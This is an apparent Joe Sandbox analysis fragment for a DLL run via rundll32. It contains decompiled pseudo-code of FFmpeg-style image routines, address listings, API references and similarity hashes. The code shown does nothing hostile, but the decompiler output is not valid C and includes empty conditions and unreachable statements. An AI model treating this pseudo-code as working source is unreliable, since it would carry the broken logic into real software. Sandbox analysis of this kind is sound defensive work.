						_t555[0xf] = _t463;
						_t496 = _t463;
						if(_t467 != 1) {
							_t464 = _t555[0x12];
							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
							_t555[0xf] = _t496;
							if(_t467 != 2) {
								_t405 =  >=  ? _t496 : _t464[0x38];
								_t555[0xf] = _t405;
								_t496 = _t405;
								if(_t467 != 3) {
									_t406 = _t464[0x4c];
									_t571 = _t496 - _t406;
									_t407 =  >=  ? _t496 : _t406;
									_t555[0xf] =  >=  ? _t496 : _t406;
								}
							}
						}
					}
					_t555[1] = _t408;
					_t555[2] = _t555[0x25];
					 *_t555 =  &(_t555[0x14]);
					if(E100215D0(_t571) < 0) {
						_t555[5] = 0x209;
						_t555[1] = 0;
						 *_t555 = 0;
						_t555[4] = "libavutil/imgutils.c";
						_t555[3] = "ret >= 0";
						_t555[2] = "Assertion %s failed at %s:%d\n";
						E10026560();
						abort();
						_push(_t543);
						_push(_t496);
						_t557 = _t555 - 0x15c;
						_t409 = _t557[0x5e];
						 *_t557 = _t409;
						_t314 = L10034790(_t408);
						 *_t557 = _t409;
						_t545 = _t314;
						_t557[0xd] = L10034870(_t519);
						_t316 = 0;
						__eflags = 0;
						do {
							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
							_t316 = _t316 + 8;
							__eflags = _t316 - 0x80;
						} while (_t316 < 0x80);
						_t557[0x14] = 0;
						_t557[0x15] = 0;
						_t557[0x16] = 0;
						_t557[0x17] = 0;
						_t557[0x18] = 0;
						_t557[0x19] = 0;
						_t557[0x1a] = 0;
						_t557[0x1b] = 0;
						__eflags = _t557[0xd] - 1 - 3;
						if(_t557[0xd] - 1 > 3) {
							L60:
							return 0xffffffea;
						} else {
							__eflags = _t545;
							if(_t545 == 0) {
								goto L60;
							} else {
								_t325 =  *(_t545 + 8);
								_t471 = _t325 & 0x00000008;
								_t498 = _t471;
								__eflags = _t498;
								if(_t498 != 0) {
									goto L60;
								} else {
									_t557[0xa] = _t325 & 0x00000020;
									__eflags = _t325 & 0x00000004;
									if(__eflags != 0) {
										 *_t557 = _t409;
										_t557[2] = 0;
										_t557[1] = _t557[0x60];
										_t547 = E10021480(__eflags);
										_t330 = _t409 - 9;
										__eflags = _t330 - 1;
										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
										__eflags = _t409 - 9;
										_t411 =  !=  ? _t498 : 0xff;
										__eflags = _t557[0xd] - 1;
										if(__eflags != 0 || __eflags == 0) {
											goto L60;
										} else {
											__eflags = _t547;
											if(_t547 <= 0) {
												goto L60;
											} else {
												__eflags = _t557[0x5c];
												if(_t557[0x5c] != 0) {
													__eflags = _t557[0x61];
													_t526 =  *(_t557[0x5c]);
													if(_t557[0x61] > 0) {
														_t335 = (_t411 & 0x000000ff) * 0x1010101;
														__eflags = _t335;
														do {
															__eflags = _t547 - 8;
															_t474 = _t547;
															_t499 = _t526;
															if(_t547 >= 8) {
																__eflags = _t526 & 0x00000001;
																if((_t526 & 0x00000001) != 0) {
																	 *_t526 = _t335;
																	_t499 = _t526 + 1;
																	_t226 = _t547 - 1; // -1
																	_t474 = _t226;
																}
																__eflags = _t499 & 0x00000002;
																if((_t499 & 0x00000002) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 2;
																	_t499 = _t499 + 2;
																}
																__eflags = _t499 & 0x00000004;
																if((_t499 & 0x00000004) != 0) {
																	 *_t499 = _t335;
																	_t474 = _t474 - 4;
																	_t499 = _t499 + 4;
																}
																_t434 = _t474;
																_t474 = _t474 & 0x00000003;
																_t435 = _t434 >> 2;
																_t335 = memset(_t499, _t335, _t435 << 2);
																_t557 =  &(_t557[3]);
																_t499 = _t499 + _t435;
															}
															_t475 = _t474 & 0x00000007;
															__eflags = _t475;
															if(_t475 != 0) {
																_t437 = 0;
																__eflags = 0;
																do {
																	 *(_t499 + _t437) = _t411;
																	_t437 = _t437 + 1;
																	__eflags = _t437 - _t475;
																} while (_t437 < _t475);
															}
															_t526 = _t526 +  *(_t557[0x5d]);
															_t216 =  &(_t557[0x61]);
															 *_t216 = _t557[0x61] - 1;
															__eflags =  *_t216;
														} while ( *_t216 != 0);
													}
												}
												goto L77;
											}
										}
									} else {
										_t477 =  *(_t545 + 4) & 0x000000ff;
										__eflags = _t477;
										if(__eflags == 0) {
											L57:
											_t557[0xa] = _t545;
											_t501 = _t557[0x60];
											_t548 = 0;
											_t528 = _t557[0xd];
											while(1) {
												_t557[2] = _t548;
												_t557[1] = _t501;
												 *_t557 = _t409;
												_t336 = E10021480(__eflags);
												 *(_t557 + 0x60 + _t548 * 4) = _t336;
												__eflags = _t336;
												if(_t336 < 0) {
													goto L60;
												}
												_t548 = _t548 + 1;
												__eflags = _t528 - _t548;
												if(__eflags <= 0) {
													_t549 = _t557[0xa];
													__eflags = _t557[0x5c];
													if(_t557[0x5c] == 0) {
														L77:
														_t332 = 0;
														__eflags = 0;
													} else {
														_t557[0x13] = _t549;
														__eflags = 0;
														_t557[0xe] =  &(_t557[0x34]);
														_t557[0xa] = 0;
														do {
															_t338 = _t557[0xa];
															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
															_t550 =  *(_t557[0x5c] + _t338 * 4);
															__eflags = _t338 - 1 - 1;
															if(_t338 - 1 <= 1) {
																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
																_t342 = 1 << _t439;
															} else {
																_t342 = 1;
																_t439 = 0;
																__eflags = 0;
															}
															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
															_t557[0xc] = _t344;
															__eflags = _t344;
															if(_t344 > 0) {
																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
																_t347 = _t557[0xf];
																_t557[0xb] = _t413;
																__eflags = _t347 - _t413;
																_t533 =  >  ? _t413 : _t347;
																_t557[0x10] = _t533;
																_t348 = _t347 - _t533;
																__eflags = _t348;
																_t557[0x11] = _t348;
																do {
																	_t534 = _t557[0xb];
																	__eflags = _t534;
																	if(_t534 != 0) {
																		_t350 = _t557[0xe];
																		_t479 =  *_t350 & 0x000000ff;
																		_t440 =  &(_t350[_t534]);
																		while(1) {
																			__eflags =  *_t350 - _t479;
																			if( *_t350 != _t479) {
																				break;
																			}
																			_t350 =  &(_t350[1]);
																			__eflags = _t440 - _t350;
																			if(_t440 == _t350) {
																				L102:
																				_t351 = _t557[0xf];
																				_t502 = _t550;
																				__eflags = _t351 - 8;
																				_t414 = _t351;
																				if(_t351 >= 8) {
																					_t352 = _t479 * 0x1010101;
																					__eflags = _t550 & 0x00000001;
																					if((_t550 & 0x00000001) != 0) {
																						 *_t550 = _t352;
																						_t502 = _t550 + 1;
																						_t414 = _t557[0xf] - 1;
																					}
																					__eflags = _t502 & 0x00000002;
																					if((_t502 & 0x00000002) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 2;
																						_t502 = _t502 + 2;
																					}
																					__eflags = _t502 & 0x00000004;
																					if((_t502 & 0x00000004) != 0) {
																						 *_t502 = _t352;
																						_t414 = _t414 - 4;
																						_t502 = _t502 + 4;
																					}
																					_t441 = _t414;
																					_t414 = _t414 & 0x00000003;
																					_t442 = _t441 >> 2;
																					memset(_t502, _t352, _t442 << 2);
																					_t557 =  &(_t557[3]);
																					_t502 = _t502 + _t442;
																				}
																				_t413 = _t414 & 0x00000007;
																				__eflags = _t413;
																				if(_t413 != 0) {
																					_t354 = 0;
																					__eflags = 0;
																					do {
																						 *(_t502 + _t354) = _t479;
																						_t354 = _t354 + 1;
																						__eflags = _t354 - _t413;
																					} while (_t354 < _t413);
																				}
																			} else {
																				continue;
																			}
																			goto L99;
																		}
																		__eflags = _t557[0xb] - 1;
																		if(_t557[0xb] == 1) {
																			goto L102;
																		} else {
																			_t355 = _t557[0x10];
																			_t503 = _t550;
																			_t537 = _t557[0xe];
																			__eflags = _t355 - 8;
																			_t444 = _t355;
																			if(_t355 >= 8) {
																				__eflags = _t550 & 0x00000001;
																				if((_t550 & 0x00000001) != 0) {
																					_t356 =  *_t537 & 0x000000ff;
																					_t503 = _t550 + 1;
																					_t537 = _t537 + 1;
																					_t557[0x12] = _t356;
																					 *_t550 = _t356;
																					_t444 = _t557[0x10] - 1;
																				}
																				__eflags = _t503 & 0x00000002;
																				if((_t503 & 0x00000002) != 0) {
																					_t358 =  *_t537 & 0x0000ffff;
																					_t503 = _t503 + 2;
																					_t537 = _t537 + 2;
																					_t444 = _t444 - 2;
																					 *(_t503 - 2) = _t358;
																				}
																				__eflags = _t503 & 0x00000004;
																				if((_t503 & 0x00000004) != 0) {
																					_t364 =  *_t537;
																					_t503 = _t503 + 4;
																					_t537 = _t537 + 4;
																					_t444 = _t444 - 4;
																					 *(_t503 - 4) = _t364;
																				}
																			}
																			memcpy(_t503, _t537, _t444);
																			_t557 =  &(_t557[3]);
																			_t557[2] = _t557[0x11];
																			_t361 = _t557[0x10];
																			_t557[1] = _t361;
																			_t362 = _t361 + _t550;
																			__eflags = _t362;
																			 *_t557 = _t362;
																			L10029830(_t413, _t537 + _t444 + _t444, _t537);
																		}
																	}
																	L99:
																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
																	_t267 =  &(_t557[0xc]);
																	 *_t267 = _t557[0xc] - 1;
																	__eflags =  *_t267;
																} while ( *_t267 != 0);
															}
															_t557[0xa] = _t557[0xa] + 1;
															_t557[0xe] = _t557[0xe] + 0x20;
															__eflags = _t557[0xd] - _t557[0xa];
														} while (_t557[0xd] > _t557[0xa]);
														_t332 = 0;
													}
													return _t332;
												} else {
													continue;
												}
												goto L121;
											}
											goto L60;
										} else {
											_t365 =  *(_t545 + 0x14);
											__eflags = _t365;
											_t447 =  >=  ? _t365 : 0;
											__eflags = _t365 - 0x20;
											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
											if(_t365 > 0x20) {
												goto L60;
											} else {
												__eflags = _t477 - 1;
												if(__eflags == 0) {
													L45:
													_t557[0x5e] = _t409;
													_t557[0xa] = _t545;
													_t367 = _t557[0xa];
													_t557[0xc] = __eflags == 0;
													_t145 = _t545 + 0x10; // 0x10
													_t538 = _t145;
													__eflags = _t557[0x5f] - 2;
													_t557[0xe] = _t367;
													_t507 = 0;
													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
													__eflags = _t369;
													_t557[0xb] = _t369;
													while(1) {
														_t449 = _t538[4];
														asm("cdq");
														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
														_t557[0x20] = 0;
														_t557[0x21] = 0;
														__eflags = _t449 - 0x10;
														_t557[0x22] = 0;
														_t557[0x23] = 0;
														if(_t449 > 0x10) {
															goto L60;
														}
														__eflags = _t449 - 7;
														if(_t449 > 7) {
															L49:
															__eflags = _t372;
															if(_t372 <= 0) {
																goto L60;
															} else {
																__eflags = _t507;
																if(_t507 != 0) {
																	L61:
																	_t199 = _t507 - 1; // -1
																	_t417 = 0;
																	__eflags = _t199 - 1;
																	if(_t199 <= 1) {
																		__eflags = _t557[0xe];
																		if(_t557[0xe] == 0) {
																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
																		}
																	} else {
																		__eflags = _t507 - 3;
																		if(_t507 == 3) {
																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
																		}
																	}
																} else {
																	__eflags = _t557[0xb];
																	if(_t557[0xb] == 0) {
																		goto L61;
																	} else {
																		_t425 = 0x10 << _t449 - 8;
																		__eflags = _t425;
																		_t417 = _t425 & 0x0000ffff;
																	}
																}
																_t552 =  &(_t557[0x24]);
																_t450 = _t552 + _t372 * 2;
																_t484 = _t552;
																do {
																	 *_t484 = _t417;
																	_t484 =  &(_t484[0]);
																	__eflags = _t450 - _t484;
																} while (_t450 != _t484);
																_t418 = _t557[0xa];
																_t538 =  &(_t538[5]);
																_t557[7] = _t372;
																_t557[5] = 0;
																_t557[0x1c] =  &(_t557[0x34]);
																_t557[4] = 0;
																_t557[0x1d] =  &(_t557[0x3c]);
																_t557[2] =  &(_t557[0x20]);
																_t557[0x1e] =  &(_t557[0x44]);
																_t557[6] = _t507;
																_t507 = _t507 + 1;
																_t557[1] =  &(_t557[0x1c]);
																_t557[3] = _t418;
																 *_t557 = _t552;
																_t557[0x1f] =  &(_t557[0x4c]);
																E10034210();
																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
																if(__eflags > 0) {
																	continue;
																} else {
																	_t545 = _t557[0xa];
																	_t409 = _t557[0x5e];
																	goto L57;
																}
															}
														} else {
															__eflags = _t557[0xc];
															if(_t557[0xc] != 0) {
																goto L60;
															} else {
																goto L49;
															}
														}
														goto L121;
													}
													goto L60;
												} else {
													_t453 =  *(_t545 + 0x24);
													_t508 =  *((intOrPtr*)(_t545 + 0x28));
													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
													__eflags = _t379 - _t508;
													_t380 =  <  ? _t508 : _t379;
													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
													__eflags = _t380 - 0x20;
													if(_t380 > 0x20) {
														goto L60;
													} else {
														__eflags = _t477 - 2;
														if(__eflags == 0) {
															goto L45;
														} else {
															_t454 =  *(_t545 + 0x38);
															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
															__eflags = _t381 - _t509;
															_t382 =  <  ? _t509 : _t381;
															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
															__eflags = _t382 - 0x20;
															if(_t382 > 0x20) {
																goto L60;
															} else {
																__eflags = _t477 - 3;
																if(__eflags == 0) {
																	goto L45;
																} else {
																	_t489 =  *(_t545 + 0x4c);
																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
																	__eflags = _t383 - _t455;
																	_t384 =  <  ? _t455 : _t383;
																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
																	__eflags = _t384 - 0x20;
																	if(__eflags > 0) {
																		goto L60;
																	} else {
																		goto L45;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t456 = 0;
						_t555[0x22] = _t519;
						_t539 = 0xffffffff;
						_t555[0x13] = _t543;
						_t555[0xe] = _t555[0x23];
						_t386 = 1;
						_t555[0x11] =  ~(_t555[0x27]);
						while(1) {
							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
							_t429 = _t555[0x22][4 + _t539 * 4];
							_t555[0xc] = _t388;
							if(_t388 <= 0) {
								goto L18;
							}
							_t553 =  *(_t555 + 0x54 + _t539 * 4);
							_t555[0x10] = _t539;
							_t555[0xb] = 0;
							_t398 = _t555[0x20];
							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
							do {
								_t458 = _t553;
								_t514 = _t398;
								_t541 = _t429;
								if(_t553 >= 8) {
									if((_t398 & 0x00000001) != 0) {
										_t514 = _t398 + 1;
										_t541 = _t429 + 1;
										 *_t398 =  *_t429 & 0x000000ff;
										_t458 = _t553 - 1;
									}
									if((_t514 & 0x00000002) != 0) {
										_t494 =  *_t541 & 0x0000ffff;
										_t514 = _t514 + 2;
										_t541 = _t541 + 2;
										_t458 = _t458 - 2;
										 *(_t514 - 2) = _t494;
									}
									if((_t514 & 0x00000004) != 0) {
										_t495 =  *_t541;
										_t514 = _t514 + 4;
										_t541 = _t541 + 4;
										_t458 = _t458 - 4;
										 *(_t514 - 4) = _t495;
									}
								}
								_t399 = memcpy(_t514, _t541, _t458);
								_t555 =  &(_t555[3]);
								_t555[0xb] =  &(_t555[0xb][1]);
								_t517 = _t555[0xd];
								_t398 = _t399 + _t517;
								_t429 = _t429 +  *(_t555[0xe]);
							} while (_t555[0xc] != _t555[0xb]);
							_t539 = _t555[0x10];
							_t68 =  &(_t555[0x20]);
							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
							__eflags =  *_t68;
							L18:
							_t539 = _t539 + 1;
							__eflags = _t555[0xf] - _t539;
							if(_t555[0xf] != _t539) {
								__eflags = _t539 - 1;
								if(_t539 <= 1) {
									_t456 = _t555[0x12][6] & 0x000000ff;
									_t386 = 1 << _t456;
								} else {
									_t386 = 1;
									_t456 = 0;
									__eflags = 0;
								}
								_t555[0xe] =  &(_t555[0xe][4]);
								continue;
							}
							_t389 = _t555[0x12];
							_t544 = _t555[0x13];
							_t540 = _t555[0x22];
							__eflags = _t389[8] & 0x00000002;
							if((_t389[8] & 0x00000002) != 0) {
								_t457 = _t555[0x20];
								_t393 = 0;
								__eflags = 0;
								do {
									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
									_t393 = _t393 + 4;
									__eflags = _t393 - 0x400;
								} while (_t393 != 0x400);
							}
							L28:
							return _t544;
							goto L121;
						}
					}
				}
				L121:
			}

0x1002334c
0x10023354
0x1002335e
0x10023365
0x1002336c
0x10023377
0x1002337a
0x10023385
0x10023389
0x1002338e
0x10023391
0x10023393
0x100233a2
0x100233a6
0x100233af
0x100235d8
0x00000000
0x100233bd
0x100233bd
0x100233c3
0x100235cd
0x100235cf
0x100233c9
0x100233d0
0x100233d6
0x100233da
0x100233dc
0x100233de
0x100233e9
0x100233f1
0x100233f5
0x100233fc
0x10023402
0x10023406
0x10023408
0x1002340a
0x1002340d
0x1002340f
0x10023412
0x10023412
0x10023408
0x100233f5
0x100233dc
0x10023416
0x10023421
0x10023429
0x10023433
0x100235df
0x100235e9
0x100235ed
0x100235f0
0x100235f8
0x10023600
0x10023608
0x1002360d
0x10023620
0x10023621
0x10023624
0x1002362a
0x10023631
0x10023634
0x10023639
0x1002363c
0x10023645
0x10023649
0x10023649
0x1002364b
0x1002364b
0x10023652
0x10023659
0x1002365c
0x1002365c
0x10023667
0x1002366f
0x10023677
0x1002367d
0x10023683
0x1002368b
0x1002368f
0x10023693
0x10023698
0x1002369b
0x100238d1
0x100238e0
0x100236a1
0x100236a1
0x100236a3
0x00000000
0x100236a9
0x100236a9
0x100236b0
0x100236b3
0x100236b3
0x100236b5
0x00000000
0x100236bb
0x100236c3
0x100236c9
0x100236cc
0x10023930
0x1002393c
0x10023940
0x10023949
0x1002394b
0x1002394e
0x10023951
0x10023954
0x1002395c
0x1002395f
0x10023964
0x00000000
0x10023979
0x10023979
0x1002397b
0x00000000
0x10023981
0x10023988
0x1002398a
0x1002399a
0x1002399c
0x1002399e
0x100239a3
0x100239a3
0x100239b0
0x100239b0
0x100239b3
0x100239b5
0x100239b7
0x100239f0
0x100239f6
0x10023a14
0x10023a16
0x10023a19
0x10023a19
0x10023a19
0x100239f8
0x100239fe
0x10023a28
0x10023a2b
0x10023a2e
0x10023a2e
0x10023a00
0x10023a06
0x10023a1e
0x10023a20
0x10023a23
0x10023a23
0x10023a08
0x10023a0a
0x10023a0d
0x10023a10
0x10023a10
0x10023a10
0x10023a10
0x100239b9
0x100239b9
0x100239bc
0x100239be
0x100239be
0x100239c0
0x100239c0
0x100239c3
0x100239c4
0x100239c4
0x100239c0
0x100239d1
0x100239d3
0x100239d3
0x100239d3
0x100239d3
0x100239b0
0x1002399e
0x00000000
0x1002398a
0x1002397b
0x100236d2
0x100236d2
0x100236d6
0x100236d8
0x10023898
0x10023898
0x1002389e
0x100238a5
0x100238a7
0x100238b9
0x100238b9
0x100238bd
0x100238c1
0x100238c4
0x100238c9
0x100238cd
0x100238cf
0x00000000
0x00000000
0x100238b0
0x100238b1
0x100238b3
0x10023a3a
0x10023a3e
0x10023a40
0x100239dc
0x100239dc
0x100239dc
0x10023a42
0x10023a42
0x10023a4d
0x10023a4f
0x10023a53
0x10023a57
0x10023a57
0x10023a5f
0x10023a6a
0x10023a6e
0x10023a71
0x10023bcb
0x10023bd4
0x10023a77
0x10023a77
0x10023a7c
0x10023a7c
0x10023a7c
0x10023a89
0x10023a8b
0x10023a8f
0x10023a91
0x10023a9b
0x10023a9f
0x10023aa3
0x10023aa7
0x10023aab
0x10023aae
0x10023ab2
0x10023ab2
0x10023ab4
0x10023ac0
0x10023ac0
0x10023ac4
0x10023ac6
0x10023ac8
0x10023acc
0x10023acf
0x10023add
0x10023add
0x10023adf
0x00000000
0x00000000
0x10023ad8
0x10023ad9
0x10023adb
0x10023b50
0x10023b50
0x10023b54
0x10023b56
0x10023b59
0x10023b5b
0x10023b6e
0x10023b74
0x10023b7a
0x10023bf0
0x10023bf3
0x10023bfa
0x10023bfa
0x10023b7c
0x10023b82
0x10023be5
0x10023be8
0x10023beb
0x10023beb
0x10023b84
0x10023b8a
0x10023bdb
0x10023bdd
0x10023be0
0x10023be0
0x10023b8c
0x10023b8e
0x10023b91
0x10023b94
0x10023b94
0x10023b94
0x10023b94
0x10023b5d
0x10023b5d
0x10023b60
0x10023b62
0x10023b62
0x10023b64
0x10023b64
0x10023b67
0x10023b68
0x10023b68
0x10023b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x10023adb
0x10023ae1
0x10023ae6
0x00000000
0x10023ae8
0x10023ae8
0x10023aec
0x10023aee
0x10023af2
0x10023af5
0x10023af7
0x10023b98
0x10023b9e
0x10023c14
0x10023c17
0x10023c1a
0x10023c1b
0x10023c1f
0x10023c26
0x10023c26
0x10023ba0
0x10023ba6
0x10023c02
0x10023c05
0x10023c08
0x10023c0b
0x10023c0e
0x10023c0e
0x10023ba8
0x10023bae
0x10023bb4
0x10023bb6
0x10023bb9
0x10023bbc
0x10023bbf
0x10023bbf
0x10023bae
0x10023afd
0x10023afd
0x10023b03
0x10023b07
0x10023b0b
0x10023b0f
0x10023b0f
0x10023b11
0x10023b14
0x10023b14
0x10023ae6
0x10023b19
0x10023b27
0x10023b29
0x10023b29
0x10023b29
0x10023b29
0x10023ac0
0x10023b2f
0x10023b33
0x10023b3c
0x10023b3c
0x10023b46
0x10023b46
0x100239e8
0x00000000
0x00000000
0x00000000
0x00000000
0x100238b3
0x00000000
0x100236de
0x100236de
0x100236e6
0x100236e8
0x100236eb
0x100236ee
0x100236f2
0x00000000
0x100236f8
0x100236f8
0x100236fb
0x1002375b
0x1002375b
0x10023766
0x1002376a
0x1002376c
0x10023776
0x10023776
0x10023779
0x10023781
0x10023788
0x1002378a
0x1002378a
0x1002378c
0x10023790
0x10023796
0x1002379d
0x1002379e
0x100237a3
0x100237ac
0x100237b3
0x100237b6
0x100237bd
0x100237c4
0x00000000
0x00000000
0x100237ca
0x100237cd
0x100237da
0x100237da
0x100237dc
0x00000000
0x100237e2
0x100237e2
0x100237e4
0x100238e8
0x100238e8
0x100238eb
0x100238ed
0x100238f0
0x10023914
0x10023916
0x10023926
0x10023926
0x100238f2
0x100238f2
0x100238f5
0x10023903
0x10023903
0x100238f5
0x100237ea
0x100237ea
0x100237f0
0x00000000
0x100237f6
0x100237fe
0x100237fe
0x10023800
0x10023800
0x100237f0
0x10023803
0x1002380a
0x1002380e
0x10023810
0x10023810
0x10023813
0x10023816
0x10023816
0x1002381a
0x10023825
0x10023828
0x1002382e
0x10023834
0x1002383f
0x1002384a
0x10023855
0x1002385d
0x10023868
0x1002386c
0x1002386d
0x10023871
0x10023875
0x10023878
0x1002387c
0x10023885
0x10023887
0x00000000
0x1002388d
0x1002388d
0x10023891
0x00000000
0x10023891
0x10023887
0x100237cf
0x100237cf
0x100237d4
0x00000000
0x00000000
0x00000000
0x00000000
0x100237d4
0x00000000
0x100237cd
0x00000000
0x100236fd
0x100236fd
0x10023700
0x10023703
0x10023707
0x10023709
0x1002370c
0x10023710
0x10023713
0x00000000
0x10023719
0x10023719
0x1002371c
0x00000000
0x1002371e
0x1002371e
0x10023721
0x10023724
0x10023728
0x1002372a
0x1002372d
0x10023731
0x10023734
0x00000000
0x1002373a
0x1002373a
0x1002373d
0x00000000
0x1002373f
0x1002373f
0x10023742
0x10023745
0x10023749
0x1002374b
0x1002374e
0x10023752
0x10023755
0x00000000
0x00000000
0x00000000
0x00000000
0x10023755
0x1002373d
0x10023734
0x1002371c
0x10023713
0x100236fb
0x100236f2
0x100236d8
0x100236cc
0x100236b5
0x100236a3
0x10023439
0x10023445
0x10023447
0x10023455
0x10023457
0x1002345d
0x10023461
0x10023466
0x1002346a
0x1002347c
0x1002347e
0x10023482
0x10023488
0x00000000
0x00000000
0x1002348e
0x10023494
0x1002349f
0x100234ad
0x100234b4
0x100234de
0x100234e1
0x100234e3
0x100234e5
0x100234e7
0x100234eb
0x1002355b
0x1002355e
0x10023561
0x10023563
0x10023563
0x100234f3
0x10023540
0x10023543
0x10023546
0x10023549
0x1002354c
0x1002354c
0x100234fb
0x100234fd
0x100234ff
0x10023502
0x10023505
0x10023508
0x10023508
0x100234fb
0x100234c0
0x100234c0
0x100234c6
0x100234ca
0x100234d4
0x100234d6
0x100234d8
0x10023514
0x1002351b
0x1002351b
0x1002351b
0x10023522
0x10023522
0x10023523
0x10023527
0x10023529
0x1002352c
0x10023574
0x1002357d
0x1002352e
0x1002352e
0x10023533
0x10023533
0x10023533
0x10023535
0x00000000
0x10023535
0x10023588
0x1002358c
0x10023590
0x1002359d
0x100235a0
0x100235a2
0x100235a9
0x100235a9
0x100235b0
0x100235b6
0x100235b9
0x100235bc
0x100235bc
0x100235b0
0x100235c3
0x100235cc
0x00000000
0x100235cc
0x1002346a
0x10023433
0x00000000

APIs

mv_image_get_buffer_size.F086 ref: 10023389

Part of subcall function 10023180: mv_pix_fmt_desc_get.F086 ref: 1002319F
Part of subcall function 10023180: mv_image_get_linesize.F086 ref: 100231D4
Part of subcall function 10023180: mv_image_fill_linesizes.F086(?), ref: 10023268
Part of subcall function 10023180: mv_image_fill_plane_sizes.F086(?), ref: 100232CB

mv_pix_fmt_desc_get.F086 ref: 10023393
mv_image_fill_linesizes.F086 ref: 1002342C
mv_log.F086 ref: 10023608
abort.MSVCRT ref: 1002360D
mv_pix_fmt_desc_get.F086 ref: 10023634
mv_pix_fmt_count_planes.F086 ref: 1002363E

Strings

, xrefs: 10023B33
Assertion %s failed at %s:%d, xrefs: 10023600

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
String ID: $Assertion %s failed at %s:%d
API String ID: 1281078460-3513380740
Opcode ID: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
Instruction ID: fcb8fd15439f2f483d5b17ebb944bfddaf5bb174ad0b20b3751318ef1a6b0b23
Opcode Fuzzy Hash: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
Instruction Fuzzy Hash: 1F429A71A083958FC761CF28E48065EBBE1FFC8354F96892EE98997310E771E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 10013100 Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

mv_mallocz.F086 ref: 10013116
mv_mallocz.F086 ref: 10013128
mv_mallocz.F086 ref: 10013154
mv_mallocz.F086 ref: 100131C3
mv_calloc.F086 ref: 100132A0

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_calloc
String ID:
API String ID: 1417229449-0
Opcode ID: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
Instruction ID: 852a126e1f502dc2a5b99aeb69476376aef21eb3025c4fc6af9fe8b8a21a2e70
Opcode Fuzzy Hash: 243904e0db8cc817c6db168582f6408dcccfb0ebab956b463a2e77faa3b9a132
